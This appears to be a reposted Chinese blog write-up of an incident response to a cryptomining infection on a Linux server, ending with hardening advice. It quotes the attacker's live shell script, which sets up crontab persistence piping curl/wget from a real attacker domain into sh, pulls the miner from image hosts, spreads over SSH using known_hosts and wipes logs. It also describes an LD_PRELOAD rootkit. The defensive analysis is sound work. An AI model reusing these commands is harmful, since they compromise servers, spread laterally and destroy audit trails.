一起挖矿病毒事件的深度分析,结果你竟想不到
mhr18 2025-05-21 15:09 4 浏览 0 评论
起因
朋友公司遇到了一起挖矿病毒事件,找我帮忙看看。
入侵分析
基本信息检查
当我登录服务器做检测时,top回显并未发现异常进程:
但是在crontab中发现一条异常的定时任务:
通过访问定时任务中的url,发现是一个shell脚本(目前已被黑客删除):
脚本分析
有了攻击脚本的话,我们就能更加快速的了解他的攻击方式了,所以让我们来分析下脚本到底干了些什么:
创建定时任务,不断检测,确保不被删除
echo "*/10 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
*/10 * * * * root (/usr/local/sbin/sshd||curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh
EOF
果然是黑客,领土意识就是比一般人强,第二步就是检测主机上是否存在其他的挖矿病毒,有的话直接干掉
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
开始下载挖矿木马了,黑客事先已经将木马文件上传到一些图片分享网站,通过脚本将木马下载到特定目录下并修改文件名,添加执行权限并启动
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
chattr -i sshd
rm -rf sshd
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "32x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190627/b91559ac5f6d4d2f94f9fba20121170c.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190627/b91559ac5f6d4d2f94f9fba20121170c.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dfrlxpr5x/raw/upload/v1561641090/x32_werii1 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dfrlxpr5x/raw/upload/v1561641090/x32_werii1 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1561641327467/1.4684002168716392.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1561641327467/1.4684002168716392.jpg -O sshd)
else
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190627/d6dced5199434ee898670f773eaaa069.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190627/d6dced5199434ee898670f773eaaa069.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dfrlxpr5x/raw/upload/v1561641004/x64_fi6qkp -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dfrlxpr5x/raw/upload/v1561641004/x64_fi6qkp -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1561641163354/5.326312443776953.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1561641163354/5.326312443776953.jpg -O sshd)
fi
fi
chmod +x sshd
$(pwd)/sshd || ./sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || /tmp/sshd || /usr/local/sbin/sshd
黑客当然不满足占领一台主机,所以脚本会遍历root,/home/*目录下的所有.ssh文件,尝试横向转播,扩大战果
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/ 2>&1 &' & done
fi
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/ 2>&1 &' & done
fi
fi
done
最后就是常规的毁尸灭迹了(这个方法有点糙。。。)
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
再次排查
我们先把crontab进程关闭,防止排查过程中不断的执行从而干扰排查工作。然后将定时任务注释或删除:
回到刚开始排查是的情况,为什么我们在top回显中一条异常信息都看不到呢?我又在主机上搜索了下脚本中提到的sshd木马:
ps和netstat命令都看不到sshd的进程信息,这个信息说明sshd是一个带有隐藏信息的rootkit,netstat中能显示端口信息但是无法显示进程信息所以能确定,这并不是一个内核级别的rootkit(为毛我有点高兴又有点失望呢。。。),所以这只是一个用户态的malware。用户态的malware方式无非就是:
1.通过替换系统中常见的进程查看工具(比如ps、top、lsof)的二进制程序,导致原先查看进程相关信息的工具(ps、top、lsof等)都被调包;
2.通过劫持getdents 等系统调用函数或libc中的readdir 函数,实现对特定进程名进程的隐藏,以达到进程隐藏目的;
3.在恶意代码中通过设置具有迷惑性的进程名字,以达到躲避管理员检查的目的;
4.利用mount —bind 将另外一个目录挂载覆盖至/proc/目录下指定进程ID的目录,我们知道ps、top等工具会读取/proc目录下获取进程信息,如果将进程ID的目录信息覆盖,则原来的进程信息将从ps的输出结果中隐匿;
我将一台正常主机的ps和netstat命令拷到本机进行测试发现还是无法看到sshd:
mounts中也没有看到异常的挂载:
那基本能确认是动态库劫持导致的隐藏,现在我们就要用到一个神器了—-“busybox“,busybox具有系统通用的命令,而且运行的时候是通过静态库调用,详细信息大家可以点击链接去了解。通过busybox,我们终于看到了那些潜伏的进程:
先干掉{sshd} [kthreadd]
进程,然后干掉/usr/local/sbin/havegeds
,因为sshd才是主进程,不先干掉sshd的话,它会不断检测拉起挖矿病毒,然后通过yum命令remove原来的openssh-server,然后重新安装openssh-server服务。
但是我们现在通过netstat和ps命令来查看进程时,还是无法看到sshd等进程,这是因为我们之前的动态库hook问题还没有解决。我们通过strace命令来看下命令执行时的系统库调用情况:
在ps命令执行时,优先加载了ld.so.preload中设置的libboost_timed.so动态库,可以看出黑客是通过利用LD_PRELOAD加载恶意动态链接库达到隐藏的目的,到该动态库下通过busybox ls命令查看,发现那个恶意动态库文件
将此恶意动态库文件移除后,终于重现sshd进程了:
对libboost_timed.so文件进行简单的逆向后,发现它还会对多个文件进行修改:
到/var/spool/cron/目录下将两个root文件都删除了,突然想了下,他是不是还在开机启动项里面留了后门呢,所以立马cd到/etc/init.d/目录下看了下,果然发现了:
立马rm了。最后我们将一开始写入的crontab任务都删除,到现在为止本机上的挖矿病毒算排查完成了。
安全防护
1.SSH:
① 谨慎做免密登录
② 尽量不使用默认的22端口
③ 增强root密码强度
2.有很多挖矿病毒是通过Redis未认证接口进行攻击的,所以建议使用redis的同学做以下加固:① 增加授权认证(requirepass参数)② 尽量使用docker版本(docker pull redis)③ 隐藏重要的命令
3.不要安装来源不明的软件,不管是在个人pc还是在测试服务器上!!!
*本文作者:Gh0stWa1ker,来源:FreeBuf.COM
近期好文:
就是要让你搞懂Nginx,这篇就够了!
“高效运维”公众号诚邀广大技术人员投稿,
投稿邮箱:jiachen@greatops.net,或添加联系人微信:greatops1118.
相关推荐
- 互联网大厂后端必看!Spring Boot 如何实现高并发抢券逻辑?
-
在当今电商、本地生活服务等行业的各类促销活动里,高并发抢券的场景极为常见。就拿双11、618购物节来说,平台发放的优惠券数量有限,然而参与抢券的用户可能达到百万甚至千万级别,瞬间产生的高并发请求,...
- 高并发秒杀系统的解决方案
-
面对秒杀活动的高并发压力,系统需要从前端到后端全面优化。一、前端三板斧是核心:加机器扩容:直接增加服务器数量,用「人海战术」扛住流量峰值。静态化页面:把图片、文字等固定内容提前保存成静态文件,通过CD...
- Quarkus集成Redis缓存加速与高并发事务避坑指南
-
一、为什么你的微服务需要Redis?在日均百万级请求的电商场景中,某核心接口响应时间从200ms降至12ms,秘诀在于合理使用Redis缓存。但在高并发场景下,错误的事务处理曾导致3000笔订单超卖,...
- 网络投票系统,Redis如何抗住瞬间高并发?
-
咱们现在在网上参与个投票活动,简直是家常便饭!无论是给喜欢的选秀爱豆打call,还是评选“年度优秀员工”,亦或是参与某个社会热点话题的民意调查,动动手指,投出自己神圣的一票,简单又方便。但你有没有想过...
- 一起挖矿病毒事件的深度分析,结果你竟想不到
-
起因朋友公司遇到了一起挖矿病毒事件,找我帮忙看看。入侵分析基本信息检查当我登录服务器做检测时,top回显并未发现异常进程:但是在crontab中发现一条异常的定时任务:通过访问定时任务中的url,发现...
- Redis 分布式锁的续期与脑裂问题解决方案
-
Redis分布式锁的续期与脑裂问题解决方案分布式锁在高并发场景中至关重要,但使用Redis实现时会面临两个关键挑战:锁续期和脑裂问题。以下是详细解决方案:一、锁续期问题解决方案1.自动续期机制...
- Redis的“兄弟姐妹”们:Memcached、MongoDB,它们有何不同?
-
咱们常说“一个好汉三个帮”。Redis虽然在很多领域都表现抢眼,但它也不是一个人在战斗!在广阔的NoSQL(NotOnlySQL,泛指非关系型数据库)世界里,Redis还有不少“兄弟姐妹”。它们各...
- 阿里淘外商业化广告工程架构实践
-
大型广告系统工程方面的主要挑战就是海量数据,快速响应,数据实时和高可用度的要求。本次分享介绍了阿里创新事业群智能营销平台在如何构建高性能、高可用、高效率,低成本的广告系统架构方面所做的诸多工作及实践经...
- TP-LINK面试真题和答案,您能做对几道?
-
话说TP-LINK联洲的秋招提前批已经开启很久了,6月份就已经开启了,并且最近已经有人陆陆续续拿到口头Offer了,所以今天就来给大家介绍一下TP-LINK的面试流程和真题及答案解析。秋...
- 六星教育PHP大神进阶班怎么样?值不值得去听?
-
点进这篇文章的人可能现在正面临着几个很难选择的问题,比如学PHP要不要报培训班?或者是该怎样选择PHP课程?又或是六星教育的PHP大神进阶班好不好,能不能去?在这里就给你们都一个一个解答了!首先,要...
- 写给技术工程师的十条精进原则
-
本文是美团技术专家以自己多年的从业经验总结出了十条精进原则,包括个人层面、团队层面和效能层面,希望也能够给视觉算法工程师们带来一些启发,更好地指导行动。作者|云鹏来源|美团技术团队引言时间回到...
- 谈谈Linux epoll惊群问题的原因和解决方案
-
近期排查了一个问题,epoll惊群的问题,起初我并不认为这是惊群导致,因为从现象上看,只是体现了CPU不均衡。一共fork了20个Server进程,在请求负载中等的时候,有三四个Server进程呈现出...
- PHP培训课程内容都有哪些?PHP培训哪些内容?
-
作为一门经久不衰的开发语言,php开发工程师一直是很多年轻人选择学习和就业的职业方向,那么PHP培训课程主要学习哪些内容呢?一、企业级开发专题:深入剖析企业实际开发过程,教授最实用的企业级技术PHP7...
- 依葫芦画瓢,我用Loki画了个Traefik的面板
-
依葫芦画瓢,我用Loki画了个Traefik的面板前段时间在Loki2.0发布时,更新了一个配套的用LogQL语法绘制Nginx监控面板的Demo。今天小白准备用同样的手法炮制一个基于Traefik日...
- 揭开微盟百万商家营销大战背后的数据库秘密
-
又到了双十一、双十二、年终大促季,每年这个时候都是购物狂欢节,不仅促销产品多、种类全、覆盖面广,促销花样也在不断翻新,直播、砍价、优惠券、加价购等,令人眼花缭乱。当全国人民沉浸在买买买的自嗨中无法自拔...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- oracle位图索引 (63)
- oracle批量插入数据 (62)
- oracle事务隔离级别 (53)
- oracle 空为0 (50)
- oracle主从同步 (55)
- oracle 乐观锁 (51)
- redis 命令 (78)
- php redis (88)
- redis 存储 (66)
- redis 锁 (69)
- 启动 redis (66)
- redis 时间 (56)
- redis 删除 (67)
- redis内存 (57)
- redis并发 (52)
- redis 主从 (69)
- redis 订阅 (51)
- redis 登录 (54)
- redis 面试 (58)
- 阿里 redis (59)
- redis 搭建 (53)
- redis的缓存 (55)
- lua redis (58)
- redis 连接池 (61)
- redis 限流 (51)